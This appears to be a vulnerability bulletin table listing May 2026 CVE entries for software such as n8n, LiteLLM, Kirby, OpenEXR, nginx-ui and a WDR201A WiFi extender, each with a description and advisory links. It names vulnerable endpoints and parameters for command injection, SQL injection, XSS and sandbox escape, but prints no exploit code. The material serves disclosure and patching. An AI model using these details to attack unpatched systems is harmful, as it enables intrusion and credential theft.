| xmldom--xmldom | xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. In @xmldom/xmldom prior to versions 0.9.10 and 0.8.13 and xmldom version 0.6.0 and prior, the package allows attacker-controlled processing instruction data to be serialized into XML without validating or neutralizing the PI-closing sequence ?>. As a result, an attacker can terminate the processing instruction early and inject arbitrary XML nodes into the serialized output. This issue has been patched in @xmldom/xmldom versions 0.9.10 and 0.8.13. | 2026-05-07 | not yet calculated | CVE-2026-41675 | https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx https://github.com/xmldom/xmldom/commit/7207a4b0e0bcc228868075ed991665ef9f73b1c2 https://github.com/xmldom/xmldom/releases/tag/0.8.13 https://github.com/xmldom/xmldom/releases/tag/0.9.10 |
| pupnp--pupnp | pupnp is an SDK for development of UPnP device and control point applications. Prior to version 1.18.5, pupnp is vulnerable to SRRF port confusion due to port truncation via atoi() cast in parse_uri(). This issue has been patched in version 1.18.5. | 2026-05-08 | not yet calculated | CVE-2026-41682 | https://github.com/pupnp/pupnp/security/advisories/GHSA-q522-6w45-4j58 https://github.com/pupnp/pupnp/commit/def5f9a2bc42f5b3d713e37c516fbe840ce54b7b https://github.com/pupnp/pupnp/releases/tag/release-1.18.5 |
| anthropics--anthropic-sdk-typescript | Claude SDK for TypeScript provides access to the Claude API from server-side TypeScript or JavaScript applications. From version 0.79.0 to before version 0.91.1, the BetaLocalFilesystemMemoryTool in the Anthropic TypeScript SDK created memory files and directories using the Node.js default modes (0o666 for files, 0o777 for directories), leaving them world-readable on systems with a standard umask and world-writable in environments with a permissive umask such as many Docker base images. A local attacker on a shared host could read persisted agent state, and in containerized deployments could modify memory files to influence subsequent model behavior. This issue has been patched in version 0.91.1. | 2026-05-04 | not yet calculated | CVE-2026-41686 | https://github.com/anthropics/anthropic-sdk-typescript/security/advisories/GHSA-p7fg-763f-g4gf |
| jackc--pgx | pgx is a PostgreSQL driver and toolkit for Go. Prior to version 5.9.2, SQL injection can occur when the non-default simple protocol is used, a dollar quoted string literal is used in the SQL query, that string literal contains text that would be interpreted as a placeholder outside of a string literal, and the value of that placeholder is controllable by the attacker. This issue has been patched in version 5.9.2. | 2026-05-08 | not yet calculated | CVE-2026-41889 | https://github.com/jackc/pgx/security/advisories/GHSA-j88v-2chj-qfwx https://github.com/jackc/pgx/commit/60644f84918a8af66d14a4b0d865d4edafd955da https://github.com/jackc/pgx/releases/tag/v5.9.2 |
| ci4-cms-erp--ci4ms | CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. From version 0.31.1.0 to before version 0.31.8.0, the deleteProcess() action accepts a POST parameter tables[] containing arbitrary table names. These are passed directly to $forge->dropTable() without validating that the tables belong to the theme being deleted. The deleteConfirm view correctly populates tables[] from the theme's own migration files, but the server-side deleteProcess does not verify the received values against those files. An authenticated admin can craft a POST request with arbitrary table names and drop any table in the database. This issue has been patched in version 0.31.8.0. | 2026-05-07 | not yet calculated | CVE-2026-41890 | https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-vgrf-pr28-vf98 https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.8.0 |
| ci4-cms-erp--ci4ms | CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. From version 0.26.0 to before version 0.31.8.0, the auth filter has the deactivated/banned user check commented out. This issue has been patched in version 0.31.8.0. | 2026-05-07 | not yet calculated | CVE-2026-41891 | https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-5hfv-c864-qcq9 https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.8.0 |
| SignalK--signalk-server | Signal K Server is a server application that runs on a central hub in a boat. Prior to version 2.25.0, the HTTP login endpoints (POST /login and POST /signalk/v1/auth/login) are protected by express-rate-limit (default: 100 attempts per 10-minute window, configurable via HTTP_RATE_LIMITS). The WebSocket login path - sending {login: {username, password}} messages over an established WebSocket connection - calls app.securityStrategy.login() directly without any rate limiting. An attacker can bypass HTTP rate limiting entirely by opening a WebSocket connection and attempting unlimited password guesses at the speed bcrypt allows (~20 attempts/sec with 10 salt rounds). This issue has been patched in version 2.25.0. | 2026-05-09 | not yet calculated | CVE-2026-41893 | https://github.com/SignalK/signalk-server/security/advisories/GHSA-vmfm-ch9h-5c7g https://github.com/SignalK/signalk-server/pull/2568 https://github.com/SignalK/signalk-server/commit/215d81eb700d5419c3396a0fbf23f2e246dfac2d https://github.com/SignalK/signalk-server/releases/tag/v2.25.0 |
| Shenzhen Yipu Commercial and Trading Co., Ltd--WDR201A WiFi Extender | WDR201A WiFi Extender (HW V2.1, FW LFMZX28040922V1.02) contains an OS command injection vulnerability in the wireless.cgi binary that allows unauthenticated remote attackers to execute arbitrary shell commands by injecting malicious input into the sz11gChannel or PIN POST parameters. Attackers can exploit unsanitized parameter handling in the set_wifi_basic and set_wifi_do_wps functions to achieve remote code execution without authentication. | 2026-05-04 | not yet calculated | CVE-2026-41922 | https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/ai-assisted-research/cybersecurity/cve/2026/05/04/Teaching_the_Machine_Where_to_Look.html https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China https://www.vulncheck.com/advisories/wdr201a-wifi-extender-os-command-injection-via-wireless-cgi |
| Shenzhen Yipu Commercial and Trading Co., Ltd--WDR201A WiFi Extender | WDR201A WiFi Extender (HW V2.1, FW LFMZX28040922V1.02) contains an OS command injection vulnerability in the internet.cgi binary that allows unauthenticated remote attackers to execute arbitrary shell commands by injecting malicious input into the gateway POST parameter. Attackers can exploit unsanitized parameter concatenation in the set_add_routing function to inject shell commands that are executed via popen() with partial output reflected in the HTTP response. | 2026-05-04 | not yet calculated | CVE-2026-41923 | https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/ai-assisted-research/cybersecurity/cve/2026/05/04/Teaching_the_Machine_Where_to_Look.html https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China https://www.vulncheck.com/advisories/wdr201a-wifi-extender-os-command-injection-via-internet-cgi |
| Shenzhen Yipu Commercial and Trading Co., Ltd--WDR201A WiFi Extender | WDR201A WiFi Extender (HW V2.1, FW LFMZX28040922V1.02) contains an OS command injection vulnerability in the makeRequest.cgi binary that allows unauthenticated remote attackers to execute arbitrary shell commands by injecting malicious input into the set_time or StartSniffer functions. Attackers can craft a POST request with specially crafted ampersand-delimited parameters to bypass input sanitization and execute commands with a maximum length of 31 bytes through the date command or channel parameter processing. | 2026-05-04 | not yet calculated | CVE-2026-41924 | https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/ai-assisted-research/cybersecurity/cve/2026/05/04/Teaching_the_Machine_Where_to_Look.html https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China https://www.vulncheck.com/advisories/wdr201a-wifi-extender-os-command-injection-via-makerequest-cgi |
| Shenzhen Yipu Commercial and Trading Co., Ltd--WDR201A WiFi Extender | WDR201A WiFi Extender (HW V2.1, FW LFMZX28040922V1.02) contains an OS command injection vulnerability in the adm.cgi binary's reboot_time function that allows unauthenticated remote attackers to execute arbitrary shell commands by injecting malicious input into the reboot_time POST parameter. Attackers can send a crafted request with shell metacharacters in the reboot_time parameter when reboot_enabled=1 to achieve remote code execution. | 2026-05-04 | not yet calculated | CVE-2026-41925 | https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/ai-assisted-research/cybersecurity/cve/2026/05/04/Teaching_the_Machine_Where_to_Look.html https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China https://www.vulncheck.com/advisories/wdr201a-wifi-extender-os-command-injection-via-adm-cgi-reboot-time |
| Shenzhen Yipu Commercial and Trading Co., Ltd--WDR201A WiFi Extender | WDR201A WiFi Extender (HW V2.1, FW LFMZX28040922V1.02) contains an OS command injection vulnerability in the firewall.cgi binary across five request handlers that apply insufficient input validation. Attackers can inject arbitrary shell commands through vulnerable parameters like websURLFilter, websHostFilter, portForward, singlePortForward, and ipportFilter using subshell syntax or unfiltered parameters, with payloads persisting in NVRAM and re-executing on every subsequent firewall.cgi request. | 2026-05-04 | not yet calculated | CVE-2026-41926 | https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/ai-assisted-research/cybersecurity/cve/2026/05/04/Teaching_the_Machine_Where_to_Look.html https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China https://www.vulncheck.com/advisories/wdr201a-wifi-extender-os-command-injection-via-firewall-cgi |
| Shenzhen Yipu Commercial and Trading Co., Ltd--WDR201A WiFi Extender | WDR201A WiFi Extender (HW V2.1, FW LFMZX28040922V1.02) contains a stack-based buffer overflow vulnerability in the firewall.cgi and makeRequest.cgi binaries that allows unauthenticated attackers to overwrite the saved return address by sending a POST request with a Content-Length header exceeding 512 bytes. Attackers can exploit insufficient length validation in the fgets() call to achieve arbitrary code execution through return-oriented programming or return-to-libc techniques. | 2026-05-04 | not yet calculated | CVE-2026-41927 | https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/ai-assisted-research/cybersecurity/cve/2026/05/04/Teaching_the_Machine_Where_to_Look.html https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China https://www.vulncheck.com/advisories/wdr201a-wifi-extender-stack-based-buffer-overflow-via-firewall-cgi |
| Apache Software Foundation--Apache OpenNLP | Arbitrary Class Instantiation via Model Manifest in Apache OpenNLP ExtensionLoader. Versions Affected: before 2.5.9, before 3.0.0-M3. Description: The ExtensionLoader.instantiateExtension(Class, String) method loads a class by its fully-qualified name via Class.forName() and invokes its no-arg constructor, with the class name sourced from the manifest.properties entry of a model archive. The existing isAssignableFrom check correctly rejects classes that are not subtypes of the expected extension interface (BaseToolFactory for factory=, ArtifactSerializer for serializer-class-*), but the check runs after Class.forName() has already loaded and initialized the named class. Class.forName() with default initialization semantics executes the target class's static initializer before returning, so an attacker who can supply a crafted model archive can cause the static initializer of any class on the classpath to run during model loading, regardless of whether that class passes the subsequent type check. Exploitation requires a class with attacker-useful side effects in its static initializer (for example, JNDI lookup, outbound network I/O, or filesystem access) to be present on the classpath, so this is not a drop-in remote code execution; however, the attack surface grows as third-party model distribution becomes more common (community model repositories, Hugging Face-style sharing), where users routinely load model files from origins they do not control. A secondary, narrower vector affects deployments that ship legitimate BaseToolFactory or ArtifactSerializer subclasses with side-effecting no-arg constructors: a malicious manifest can name such a class and force its constructor to run during model load. Mitigation: 2.x users should upgrade to 2.5.9; 3.x users should upgrade to 3.0.0-M3. Note: The fix introduces a package-prefix allowlist that is consulted before Class.forName() is invoked, so the static initializer of a disallowed class is never executed. Classes under the opennlp. prefix remain permitted by default. Deployments that load models referencing factories or serializers outside opennlp.* must opt those packages in, either programmatically via ExtensionLoader.registerAllowedPackage(String) before the first model load, or by setting the OPENNLP_EXT_ALLOWED_PACKAGES system property to a comma-separated list of allowed package prefixes. Users who cannot upgrade immediately should ensure that all model files are sourced from trusted origins and should audit their classpath for classes with side-effecting static initializers or constructors, particularly any that perform JNDI lookups, network requests, or filesystem operations during class initialization. | 2026-05-04 | not yet calculated | CVE-2026-42027 | https://lists.apache.org/thread/ltlo4powjfc0w2w2yyl1o5tc7q1gcb2y |
| getkirby--kirby | Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, the system API endpoint leaks license data and installed version to authenticated users. This issue has been patched in versions 4.9.0 and 5.4.0. | 2026-05-09 | not yet calculated | CVE-2026-42051 | https://github.com/getkirby/kirby/security/advisories/GHSA-x68m-c7jf-2572 https://github.com/getkirby/kirby/releases/tag/4.9.0 https://github.com/getkirby/kirby/releases/tag/5.4.0 |
| beetbox--beets | Beets is the media library management system. Prior to version 2.10.0, the bundled web UI uses Underscore template interpolation mode <%= ... %> for untrusted metadata fields. In this runtime, <%= ... %> is raw insertion and HTML escaping is only performed by <%- ... %>. Rendered output is then inserted with .html(...), allowing attacker-controlled markup to become active DOM. This issue has been patched in version 2.10.0. | 2026-05-04 | not yet calculated | CVE-2026-42052 | https://github.com/beetbox/beets/security/advisories/GHSA-3gxm-wfjx-m847 https://github.com/beetbox/beets/releases/tag/v2.10.0 |
| getkirby--kirby | Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, read access to site, user and role information is not gated by permissions. This issue has been patched in versions 4.9.0 and 5.4.0. | 2026-05-09 | not yet calculated | CVE-2026-42069 | https://github.com/getkirby/kirby/security/advisories/GHSA-2h7v-4372-f6x2 https://github.com/getkirby/kirby/releases/tag/4.9.0 https://github.com/getkirby/kirby/releases/tag/5.4.0 |
| getkirby--kirby | Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, `pages.access/list` and `files.access/list` permissions are not consistently checked in the Panel and REST API. This issue has been patched in versions 4.9.0 and 5.4.0. | 2026-05-09 | not yet calculated | CVE-2026-42137 | https://github.com/getkirby/kirby/security/advisories/GHSA-85x2-r8xv-ww8c https://github.com/getkirby/kirby/releases/tag/4.9.0 https://github.com/getkirby/kirby/releases/tag/5.4.0 |
| langgenius--dify | Dify is an open-source LLM app development platform. Prior to version 1.13.1, using the method POST /api/files/upload, any unauthenticated user can upload an SVG file with XSS. The method POST /v1/files/upload, which requires authentication through the application API, is also vulnerable. This issue has been patched in version 1.13.1. | 2026-05-04 | not yet calculated | CVE-2026-42138 | https://github.com/langgenius/dify/security/advisories/GHSA-cg94-8v83-7hjj https://github.com/langgenius/dify/releases/tag/1.13.1 |
| sovity--dataspace-portal | Data Space Portal is an open-source Software as a Service (SaaS) solution designed to streamline Dataspace management. From version 2.1.1 to before version 7.3.2, there is insufficient authorization in the dataspace-portal backend regarding self-registered "PENDING" organization / user accounts. This issue has been patched in version 7.3.2. | 2026-05-08 | not yet calculated | CVE-2026-42160 | https://github.com/sovity/dataspace-portal/security/advisories/GHSA-989g-wpfv-6vxx https://github.com/sovity/dataspace-portal/releases/tag/v7.3.2 |
| getkirby--kirby | Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, user avatar creation, replacement and deletion are not gated by user update permissions. This issue has been patched in versions 4.9.0 and 5.4.0. | 2026-05-09 | not yet calculated | CVE-2026-42174 | https://github.com/getkirby/kirby/security/advisories/GHSA-39cp-6679-8xv2 https://github.com/getkirby/kirby/releases/tag/4.9.0 https://github.com/getkirby/kirby/releases/tag/5.4.0 |
| argoproj--argo-workflows | Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. From version 4.0.0 to before version 4.0.5, a nil pointer dereference in server/auth/gatekeeper.go rbacAuthorization() causes a panic (denial of service) for SSO users whose claims match a namespace-level RBAC rule but not an SSO-namespace rule, when SSO_DELEGATE_RBAC_TO_NAMESPACE=true. This issue has been patched in version 4.0.5. | 2026-05-09 | not yet calculated | CVE-2026-42183 | https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p4gq-3vxj-f4jq https://github.com/argoproj/argo-workflows/commit/c4cc17d0c034fa9a9cc01ef1af6c8016c93071d4 https://github.com/argoproj/argo-workflows/releases/tag/v4.0.5 |
| BerriAI--litellm | LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.80.5 to before version 1.83.7, the POST /prompts/test endpoint accepted user-supplied prompt templates and rendered them without sandboxing. A crafted template could run arbitrary code inside the LiteLLM Proxy process. The endpoint only checks that the caller presents a valid proxy API key, so any authenticated user could reach it. Depending on how the proxy is deployed, this could expose secrets in the process environment (such as provider API keys or database credentials) and allow commands to be run on the host. This issue has been patched in version 1.83.7. | 2026-05-08 | not yet calculated | CVE-2026-42203 | https://github.com/BerriAI/litellm/security/advisories/GHSA-xqmj-j6mv-4862 https://github.com/BerriAI/litellm/releases/tag/v1.83.7-stable |
| roadiz--core-bundle-dev-app | Roadiz is a polymorphic content management system based on a node system. Prior to versions 2.3.43, 2.5.45, 2.6.31, and 2.7.18, the roadiz/openid package generates an OIDC nonce in OAuth2LinkGenerator::generate() and includes it in the authorization request sent to the identity provider, but never stores it and never validates it on the callback. The OpenIdJwtConfigurationFactory validation chain does not include a nonce constraint, and OpenIdAuthenticator::authenticate() never checks the nonce claim in the returned ID token against a stored value. This issue has been patched in versions 2.3.43, 2.5.45, 2.6.31, and 2.7.18. | 2026-05-08 | not yet calculated | CVE-2026-42206 | https://github.com/roadiz/core-bundle-dev-app/security/advisories/GHSA-3gx8-q682-38mx |
| BerriAI--litellm | LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.81.16 to before version 1.83.7, a database query used during proxy API key checks mixed the caller-supplied key value into the query text instead of passing it as a separate parameter. An unauthenticated attacker could send a specially crafted Authorization header to any LLM API route (for example POST /chat/completions) and reach this query through the proxy's error-handling path. An attacker could read data from the proxy's database and may be able to modify it, leading to unauthorised access to the proxy and the credentials it manages. This issue has been patched in version 1.83.7. | 2026-05-08 | not yet calculated | CVE-2026-42208 | https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc https://github.com/BerriAI/litellm/releases/tag/v1.83.7-stable |
| anzory--SolidCAM-GPPL-IDE | SolidCAM-GPPL-IDE is an unofficial, independently developed Postprocessor IDE extension for SolidCAM. From version 1.0.0 to before version 1.0.2, opening a .gpp file in the SolidCAM Postprocessor IDE extension causes the language server to parse a companion .vmid file from the same directory (naming convention: foo.gpp to foo.vmid). The VMID parser called XDocument.Load(path) without any XmlReaderSettings, inheriting the framework defaults which in .NET 8 allow DTD processing. A malicious .vmid file could therefore: disclose local files via external entity references, exhaust memory via recursive entity expansion, and cause denial of service via oversized or deeply nested XML. This issue has been patched in version 1.0.2. | 2026-05-08 | not yet calculated | CVE-2026-42212 | https://github.com/anzory/SolidCAM-GPPL-IDE/security/advisories/GHSA-92vg-f4fq-fxm9 https://github.com/anzory/SolidCAM-GPPL-IDE/commit/9d0ba808afd143ede448026a5dc681bfdc5c138d https://github.com/anzory/SolidCAM-GPPL-IDE/blob/master/CHANGELOG.md#102--2026-04-20 https://github.com/anzory/SolidCAM-GPPL-IDE/releases/tag/v1.0.2 |
| anzory--SolidCAM-GPPL-IDE | SolidCAM-GPPL-IDE is an unofficial, independently developed Postprocessor IDE extension for SolidCAM. From version 1.0.0 to before version 1.0.2, the inc "filename" directive in GPPL postprocessor files is resolved by GpplDocumentLinkHandler into a clickable link (VS Code textDocument/documentLink). The handler accepted arbitrary paths - absolute, relative with parent-directory segments (..\..\..\), UNC (\\server\share\), and arbitrary subfolders - and called File.Exists on each to decide whether to render the link. Two distinct attack surfaces resulted: information disclosure via File.Exists probing and NTLM hash leak via UNC path probing. This issue has been patched in version 1.0.2. | 2026-05-08 | not yet calculated | CVE-2026-42213 | https://github.com/anzory/SolidCAM-GPPL-IDE/security/advisories/GHSA-xvpx-9p39-g62m https://github.com/anzory/SolidCAM-GPPL-IDE/commit/9d0ba808afd143ede448026a5dc681bfdc5c138d https://github.com/anzory/SolidCAM-GPPL-IDE/releases/tag/v1.0.2 |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From versions 3.0.0 to before 3.2.9, 3.3.0 to before 3.3.11, and 3.4.0 to before 3.4.11, IDManifest::init() reconstructs strings from a prefix-compressed representation. If the previous string is longer than 255 bytes, the next string is expected to begin with a 2-byte prefix length. The code reads stringList[i][0] and stringList[i][1] without checking that the current string has at least two bytes. This issue has been patched in versions 3.2.9, 3.3.11, and 3.4.11. | 2026-05-07 | not yet calculated | CVE-2026-42216 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-65j8-95g9-jgj4 |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From versions 3.0.0 to before 3.2.9, 3.3.0 to before 3.3.11, and 3.4.0 to before 3.4.11, readVariableLengthInteger() decodes a variable-length integer from untrusted EXR input without bounding the shift count. After enough continuation bytes, the code executes a left shift by 70 on a 64-bit value, which is undefined behavior. This issue has been patched in versions 3.2.9, 3.3.11, and 3.4.11. | 2026-05-07 | not yet calculated | CVE-2026-42217 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-3c67-4wwp-w52m https://github.com/AcademySoftwareFoundation/openexr/pull/2378 https://github.com/AcademySoftwareFoundation/openexr/commit/21eaa33bcbbb0c83a5fc42f6b6d65b70a996e63c |
| pjsip--pjproject | PJSIP is a free and open source multimedia communication library written in C. Prior to version 2.17, on GnuTLS builds, the SIP TLS transport (sip_transport_tls) can accept connections with invalid or untrusted certificates even when the application explicitly enables certificate verification via verify_server = PJ_TRUE or verify_client = PJ_TRUE. This issue has been patched in version 2.17. | 2026-05-07 | not yet calculated | CVE-2026-42225 | https://github.com/pjsip/pjproject/security/advisories/GHSA-x2fv-6j6c-pxmx https://github.com/pjsip/pjproject/commit/ef684252bb62b0716675b6e99ad7fe4c90e28920 https://github.com/pjsip/pjproject/releases/tag/2.17 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.33 and 2.17.5, the dynamic-node-parameters endpoints did not verify whether the authenticated caller was authorized to use a supplied credential reference. An authenticated user with access to a shared workflow could supply a foreign credential ID in the request body, causing the backend to decrypt and use that credential in a helper execution path where the caller also controls the destination URL. This allowed the caller to force the backend to authenticate against attacker-controlled infrastructure using a credential belonging to another user, effectively exfiltrating a reusable API key. The issue is not limited to any single node type; any node that resolves credentials dynamically through these endpoints may be affected. This issue has been patched in versions 1.123.33, 2.17.5, and 2.18.0. | 2026-05-04 | not yet calculated | CVE-2026-42226 | https://github.com/n8n-io/n8n/security/advisories/GHSA-r4v6-9fqc-w5jr |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, an authenticated user with a valid API key scoped to variable:list could read variables from projects they are not a member of by supplying an arbitrary projectId query parameter to the public API variables endpoint. The handler queried the variables repository directly without enforcing project membership checks, bypassing the authorization-aware service layer used by the internal enterprise controller. If variables were misused to store sensitive information such as credentials or tokens, they should be rotated immediately. This issue only affects licensed enterprise or team deployments with multiple projects and the variables feature enabled. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42227 | https://github.com/n8n-io/n8n/security/advisories/GHSA-756q-gq9h-fp22 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, the /chat WebSocket endpoint used by the Chat Trigger node's Hosted Chat feature did not verify that an incoming connection was authorized to interact with the target execution. An unauthenticated remote attacker who could identify a valid execution ID for a workflow in a waiting state could attach to that execution, receive the pending prompt intended for the legitimate user, and submit arbitrary input to resume or influence downstream workflow behavior. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42228 | https://github.com/n8n-io/n8n/security/advisories/GHSA-f77h-j2v7-g6mw |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, a flaw in the SeaTable node's row:search and row:get operations allowed user-controlled input to be concatenated directly into SQL query strings without escaping or parameterization. In workflows where external user input is passed via expressions into the SeaTable node's search or row retrieval parameters, an attacker could manipulate the constructed query to retrieve unintended rows from the connected SeaTable base, bypassing row-level filtering logic implemented in the workflow. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42229 | https://github.com/n8n-io/n8n/security/advisories/GHSA-mp4j-h6gh-f6mp |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, the /mcp-oauth/register endpoint accepted OAuth client registrations without authentication, allowing arbitrary redirect_uri values to be registered. When a user denies the MCP OAuth consent dialog, the handleDeny handler redirects the user to the registered redirect_uri without validation, enabling an open redirect to an attacker-controlled URL. An attacker can craft a phishing link and send it to a victim; if the victim clicks "Deny" on the consent page, they are silently redirected to an external site. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42230 | https://github.com/n8n-io/n8n/security/advisories/GHSA-f6x8-65q6-j9m9 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, a flaw in the xml2js library used to parse XML request bodies in n8n's webhook handler allowed prototype pollution via a crafted XML payload. An authenticated user with permission to create or modify workflows could exploit this to pollute the JavaScript object prototype and, by chaining the pollution with the Git node's SSH operations, achieve remote code execution on the n8n host. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42231 | https://github.com/n8n-io/n8n/security/advisories/GHSA-q5f4-99jv-pgg5 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, an authenticated user with permission to create or modify workflows could achieve global prototype pollution via the XML Node leading to RCE when combined with other nodes exploiting the prototype pollution. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42232 | https://github.com/n8n-io/n8n/security/advisories/GHSA-hqr4-h3xv-9m3r |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, a flaw in the Oracle Database node's select operation allowed user-controlled input passed into the Limit field via expressions to be interpolated directly into the SQL query without sanitization or parameterization. In workflows where external input is passed into the Limit field (e.g., from a webhook), an attacker could inject arbitrary SQL and exfiltrate data from the connected Oracle database. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42233 | https://github.com/n8n-io/n8n/security/advisories/GHSA-r6jc-mpqw-m755 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, an authenticated user with permission to create or modify workflows containing a Python Code Node could escape the sandbox and achieve arbitrary code execution on the task runner container. This issue only affects instances where the Python Task Runner is enabled. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42234 | https://github.com/n8n-io/n8n/security/advisories/GHSA-44v6-jhgm-p3m4 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, an unauthenticated attacker could register a malicious MCP OAuth client with a crafted client_name. If a victim user authorized the OAuth consent dialog and a second user subsequently revoked that access, a toast notification would render the injected script. Clicking the link would execute arbitrary JavaScript in the victim's authenticated n8n browser session, enabling credential and session token theft, workflow manipulation, or privilege escalation. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42235 | https://github.com/n8n-io/n8n/security/advisories/GHSA-537j-gqpc-p7fq |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, the MCP OAuth client registration endpoint accepted unauthenticated requests and stored client data without adequate resource controls. An unauthenticated remote attacker could exhaust server memory resources by sending large registration payloads, rendering the n8n instance unavailable. The MCP enable/disable toggle gates MCP access but did not restrict client registrations, meaning the endpoint is reachable regardless of whether MCP access is enabled on the instance. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42236 | https://github.com/n8n-io/n8n/security/advisories/GHSA-49m9-pgww-9vq6 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, the fix for GHSA-f3f2-mcxc-pwjx did not cover the Snowflake node or the legacy MySQL v1 node. Both nodes construct SQL queries by directly interpolating user-controlled table names, column names, and update keys into query strings without identifier escaping, enabling SQL injection against the connected database. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42237 | https://github.com/n8n-io/n8n/security/advisories/GHSA-hp3c-vfpm-q4f7 |
| 0xJacky--nginx-ui | Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.8, nginx-ui exposes a backup restore endpoint (POST /api/restore) that is completely unauthenticated during the first 10 minutes after process startup on any fresh installation. An unauthenticated remote attacker can upload a crafted backup archive that overwrites the application's configuration file (app.ini) and SQLite database. Because the attacker controls the restored app.ini, they can inject an arbitrary OS command into the TestConfigCmd setting. After the application automatically restarts to apply the restored config, a single follow-up request triggers that command as the user running nginx-ui - typically root in Docker deployments. This issue has been patched in version 2.3.8. | 2026-05-04 | not yet calculated | CVE-2026-42238 | https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8 |
